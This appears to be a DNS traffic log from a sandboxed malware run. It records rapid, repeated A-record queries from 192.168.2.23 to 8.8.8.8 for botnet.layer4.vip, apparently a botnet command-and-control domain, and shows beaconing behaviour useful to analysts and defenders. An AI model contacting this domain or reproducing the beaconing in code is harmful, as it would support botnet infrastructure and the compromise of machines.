                                  Apr 9, 2023 03:31:10.946079016 CEST192.168.2.238.8.8.80xc30fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.970099926 CEST192.168.2.238.8.8.80xc30fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.994246960 CEST192.168.2.238.8.8.80xc30fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.010293961 CEST192.168.2.238.8.8.80x5535Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.034418106 CEST192.168.2.238.8.8.80x5535Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.058500051 CEST192.168.2.238.8.8.80x5535Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.074131012 CEST192.168.2.238.8.8.80x5535Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.098314047 CEST192.168.2.238.8.8.80x5535Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.122728109 CEST192.168.2.238.8.8.80x61f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.147334099 CEST192.168.2.238.8.8.80x61f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.163216114 CEST192.168.2.238.8.8.80x61f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.187176943 CEST192.168.2.238.8.8.80x61f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.211992979 CEST192.168.2.238.8.8.80x61f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.228019953 CEST192.168.2.238.8.8.80x11f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.252197027 CEST192.168.2.238.8.8.80x11f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.267803907 CEST192.168.2.238.8.8.80x11f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.292258024 CEST192.168.2.238.8.8.80x11f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.316459894 CEST192.168.2.238.8.8.80x11f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.341099024 CEST192.168.2.238.8.8.80xe5a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.356651068 CEST192.168.2.238.8.8.80xe5a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.381006956 CEST192.168.2.238.8.8.80xe5a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.405162096 CEST192.168.2.238.8.8.80xe5a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.429209948 CEST192.168.2.238.8.8.80xe5a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.453718901 CEST192.168.2.238.8.8.80x7da3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.469238997 CEST192.168.2.238.8.8.80x7da3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.485208988 CEST192.168.2.238.8.8.80x7da3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.500808954 CEST192.168.2.238.8.8.80x7da3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.516362906 CEST192.168.2.238.8.8.80x7da3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.540766001 CEST192.168.2.238.8.8.80x1869Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.556271076 CEST192.168.2.238.8.8.80x1869Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.580647945 CEST192.168.2.238.8.8.80x1869Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.596044064 CEST192.168.2.238.8.8.80x1869Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.620430946 CEST192.168.2.238.8.8.80x1869Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.636321068 CEST192.168.2.238.8.8.80xe9f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.651865959 CEST192.168.2.238.8.8.80xe9f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.677850962 CEST192.168.2.238.8.8.80xe9f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.693377018 CEST192.168.2.238.8.8.80xe9f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.717544079 CEST192.168.2.238.8.8.80xe9f3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.744182110 CEST192.168.2.238.8.8.80x493Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.768982887 CEST192.168.2.238.8.8.80x493Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.784627914 CEST192.168.2.238.8.8.80x493Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.809250116 CEST192.168.2.238.8.8.80x493Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.833674908 CEST192.168.2.238.8.8.80x493Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.851528883 CEST192.168.2.238.8.8.80xbd4aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.867052078 CEST192.168.2.238.8.8.80xbd4aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.882929087 CEST192.168.2.238.8.8.80xbd4aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.898634911 CEST192.168.2.238.8.8.80xbd4aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.914196968 CEST192.168.2.238.8.8.80xbd4aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.929742098 CEST192.168.2.238.8.8.80x75eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.945291996 CEST192.168.2.238.8.8.80x75eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.969783068 CEST192.168.2.238.8.8.80x75eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:11.987118006 CEST192.168.2.238.8.8.80x75eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.002695084 CEST192.168.2.238.8.8.80x75eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.027861118 CEST192.168.2.238.8.8.80xaaffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.052287102 CEST192.168.2.238.8.8.80xaaffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.069297075 CEST192.168.2.238.8.8.80xaaffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.093992949 CEST192.168.2.238.8.8.80xaaffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.119661093 CEST192.168.2.238.8.8.80xaaffStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.144335985 CEST192.168.2.238.8.8.80x74cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.160566092 CEST192.168.2.238.8.8.80x74cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.176372051 CEST192.168.2.238.8.8.80x74cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.192722082 CEST192.168.2.238.8.8.80x74cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.217127085 CEST192.168.2.238.8.8.80x74cbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.233319998 CEST192.168.2.238.8.8.80x50eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.258375883 CEST192.168.2.238.8.8.80x50eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.274986029 CEST192.168.2.238.8.8.80x50eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.291017056 CEST192.168.2.238.8.8.80x50eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.315416098 CEST192.168.2.238.8.8.80x50eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.331391096 CEST192.168.2.238.8.8.80xaa21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.356050014 CEST192.168.2.238.8.8.80xaa21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.372301102 CEST192.168.2.238.8.8.80xaa21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.396684885 CEST192.168.2.238.8.8.80xaa21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.421247005 CEST192.168.2.238.8.8.80xaa21Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.445761919 CEST192.168.2.238.8.8.80xfb8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.462269068 CEST192.168.2.238.8.8.80xfb8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.487061024 CEST192.168.2.238.8.8.80xfb8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.512135983 CEST192.168.2.238.8.8.80xfb8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.528209925 CEST192.168.2.238.8.8.80xfb8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.544146061 CEST192.168.2.238.8.8.80x19e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.568615913 CEST192.168.2.238.8.8.80x19e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.593482971 CEST192.168.2.238.8.8.80x19e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.617863894 CEST192.168.2.238.8.8.80x19e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.633936882 CEST192.168.2.238.8.8.80x19e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.658399105 CEST192.168.2.238.8.8.80x5eefStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.682653904 CEST192.168.2.238.8.8.80x5eefStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.710839033 CEST192.168.2.238.8.8.80x5eefStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.726759911 CEST192.168.2.238.8.8.80x5eefStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.751106024 CEST192.168.2.238.8.8.80x5eefStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.767177105 CEST192.168.2.238.8.8.80x70c2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.791801929 CEST192.168.2.238.8.8.80x70c2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.808305025 CEST192.168.2.238.8.8.80x70c2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.824121952 CEST192.168.2.238.8.8.80x70c2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.841658115 CEST192.168.2.238.8.8.80x70c2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.867151976 CEST192.168.2.238.8.8.80xc837Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.891799927 CEST192.168.2.238.8.8.80xc837Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.917834997 CEST192.168.2.238.8.8.80xc837Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.942270994 CEST192.168.2.238.8.8.80xc837Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.958246946 CEST192.168.2.238.8.8.80xc837Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.974236012 CEST192.168.2.238.8.8.80xc7c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:12.990268946 CEST192.168.2.238.8.8.80xc7c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.014489889 CEST192.168.2.238.8.8.80xc7c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.030807018 CEST192.168.2.238.8.8.80xc7c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.054980040 CEST192.168.2.238.8.8.80xc7c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.079871893 CEST192.168.2.238.8.8.80x12f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.095741034 CEST192.168.2.238.8.8.80x12f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.120115995 CEST192.168.2.238.8.8.80x12f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.145176888 CEST192.168.2.238.8.8.80x12f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.161171913 CEST192.168.2.238.8.8.80x12f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.177058935 CEST192.168.2.238.8.8.80x2d3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.201848984 CEST192.168.2.238.8.8.80x2d3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.217825890 CEST192.168.2.238.8.8.80x2d3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.241967916 CEST192.168.2.238.8.8.80x2d3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.266546011 CEST192.168.2.238.8.8.80x2d3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.282259941 CEST192.168.2.238.8.8.80x70ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.306618929 CEST192.168.2.238.8.8.80x70ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.323285103 CEST192.168.2.238.8.8.80x70ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.347789049 CEST192.168.2.238.8.8.80x70ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.364176035 CEST192.168.2.238.8.8.80x70ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.388515949 CEST192.168.2.238.8.8.80x80eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.404170036 CEST192.168.2.238.8.8.80x80eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.419811964 CEST192.168.2.238.8.8.80x80eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.444072008 CEST192.168.2.238.8.8.80x80eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.468790054 CEST192.168.2.238.8.8.80x80eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.493446112 CEST192.168.2.238.8.8.80xb105Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.517887115 CEST192.168.2.238.8.8.80xb105Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.534811020 CEST192.168.2.238.8.8.80xb105Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.559933901 CEST192.168.2.238.8.8.80xb105Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.584796906 CEST192.168.2.238.8.8.80xb105Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.609441996 CEST192.168.2.238.8.8.80x7fbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.625044107 CEST192.168.2.238.8.8.80x7fbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.641230106 CEST192.168.2.238.8.8.80x7fbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.657686949 CEST192.168.2.238.8.8.80x7fbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.682300091 CEST192.168.2.238.8.8.80x7fbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.709281921 CEST192.168.2.238.8.8.80x2703Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.725049973 CEST192.168.2.238.8.8.80x2703Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.750338078 CEST192.168.2.238.8.8.80x2703Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.775126934 CEST192.168.2.238.8.8.80x2703Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.791584015 CEST192.168.2.238.8.8.80x2703Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.816987038 CEST192.168.2.238.8.8.80x5257Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.833280087 CEST192.168.2.238.8.8.80x5257Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.853899002 CEST192.168.2.238.8.8.80x5257Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.879534006 CEST192.168.2.238.8.8.80x5257Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.904055119 CEST192.168.2.238.8.8.80x5257Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.919774055 CEST192.168.2.238.8.8.80x1e2cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.935507059 CEST192.168.2.238.8.8.80x1e2cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.960016966 CEST192.168.2.238.8.8.80x1e2cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.975791931 CEST192.168.2.238.8.8.80x1e2cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:13.991605997 CEST192.168.2.238.8.8.80x1e2cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.016567945 CEST192.168.2.238.8.8.80xf2d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.041522026 CEST192.168.2.238.8.8.80xf2d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.057327032 CEST192.168.2.238.8.8.80xf2d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.073398113 CEST192.168.2.238.8.8.80xf2d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.089323997 CEST192.168.2.238.8.8.80xf2d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.113809109 CEST192.168.2.238.8.8.80x7d8aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.129806042 CEST192.168.2.238.8.8.80x7d8aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.154078007 CEST192.168.2.238.8.8.80x7d8aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.178409100 CEST192.168.2.238.8.8.80x7d8aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.202938080 CEST192.168.2.238.8.8.80x7d8aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.218990088 CEST192.168.2.238.8.8.80x91caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.234728098 CEST192.168.2.238.8.8.80x91caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.259378910 CEST192.168.2.238.8.8.80x91caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.274976015 CEST192.168.2.238.8.8.80x91caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.290544987 CEST192.168.2.238.8.8.80x91caStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.315222025 CEST192.168.2.238.8.8.80xff97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.339833975 CEST192.168.2.238.8.8.80xff97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.364336014 CEST192.168.2.238.8.8.80xff97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.388525009 CEST192.168.2.238.8.8.80xff97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.404572964 CEST192.168.2.238.8.8.80xff97Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.429449081 CEST192.168.2.238.8.8.80x1d8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.453804016 CEST192.168.2.238.8.8.80x1d8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.469526052 CEST192.168.2.238.8.8.80x1d8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.485255003 CEST192.168.2.238.8.8.80x1d8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.509460926 CEST192.168.2.238.8.8.80x1d8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.525110960 CEST192.168.2.238.8.8.80x3623Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.541073084 CEST192.168.2.238.8.8.80x3623Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.557034016 CEST192.168.2.238.8.8.80x3623Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.581264973 CEST192.168.2.238.8.8.80x3623Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.596970081 CEST192.168.2.238.8.8.80x3623Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.621301889 CEST192.168.2.238.8.8.80x5698Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.636888981 CEST192.168.2.238.8.8.80x5698Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.661484957 CEST192.168.2.238.8.8.80x5698Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.685969114 CEST192.168.2.238.8.8.80x5698Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.711922884 CEST192.168.2.238.8.8.80x5698Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.736386061 CEST192.168.2.238.8.8.80x1c08Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.760874033 CEST192.168.2.238.8.8.80x1c08Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.776536942 CEST192.168.2.238.8.8.80x1c08Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.792458057 CEST192.168.2.238.8.8.80x1c08Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.816665888 CEST192.168.2.238.8.8.80x1c08Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.832312107 CEST192.168.2.238.8.8.80xb7f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.847922087 CEST192.168.2.238.8.8.80xb7f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.871982098 CEST192.168.2.238.8.8.80xb7f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.887718916 CEST192.168.2.238.8.8.80xb7f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.903618097 CEST192.168.2.238.8.8.80xb7f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.928154945 CEST192.168.2.238.8.8.80xade4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.944020033 CEST192.168.2.238.8.8.80xade4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.968288898 CEST192.168.2.238.8.8.80xade4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:14.984199047 CEST192.168.2.238.8.8.80xade4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
